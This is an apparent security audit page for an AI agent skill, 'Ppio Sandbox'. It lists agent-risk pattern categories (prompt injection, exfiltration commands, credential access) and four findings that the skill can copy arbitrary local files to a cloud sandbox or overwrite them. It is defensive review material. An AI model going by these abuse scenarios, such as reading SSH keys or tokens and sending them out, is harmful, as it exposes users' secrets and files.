Ppio Sandbox

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its cloud-sandbox purpose, but it needs Review because it can copy arbitrary local files to and from a third-party sandbox and overwrite local files despite saying it is not for local file access.

Install only if you are comfortable giving this skill a PPIO/E2B API key and letting it run commands in a billable cloud VM. Treat upload and download as sensitive operations: do not transfer secrets, credentials, SSH keys, private code, personal config, or workspace files unless you explicitly intend to send them to the cloud sandbox, and avoid downloading over existing local files. Kill sandboxes after use, especially after login-based browsing, because paused sandboxes can preserve files and browser state.

SkillSpector

By NVIDIA

Vulnerability Patterns

Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access

Findings (4)

Description-Behavior Mismatch

High

Confidence: 98% confidence
Finding: The skill metadata explicitly says it is not for reading or writing local user files, yet the upload and download commands directly access arbitrary host filesystem paths. In an agent setting, this creates a clear capability mismatch that can be abused to exfiltrate sensitive local files into the sandbox or overwrite files on the host, violating the stated trust boundary.

Context-Inappropriate Capability

High

Confidence: 98% confidence
Finding: Arbitrary local file read/write is unjustified for a tool whose intended purpose is remote sandbox execution and browser isolation. Because the CLI accepts user-supplied local paths without restriction, an LLM agent could be induced to read secrets such as SSH keys or tokens, or write attacker-controlled data to sensitive host locations.

Intent-Code Divergence

Medium

Confidence: 83% confidence
Finding: The module documentation presents the tool as providing secure remote execution, but the implementation also performs direct host-local file operations. This misleading framing can cause operators or downstream agents to overtrust the tool and use it in contexts where host isolation is assumed, increasing the chance of unsafe data exposure or file modification.

Missing User Warnings

Medium

Confidence: 93% confidence
Finding: The download command writes directly to an arbitrary local path using normal file open semantics, which will overwrite existing files without warning. In an automated agent workflow, this can destroy host data or replace trusted local files with untrusted sandbox content, enabling persistence or corruption.

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal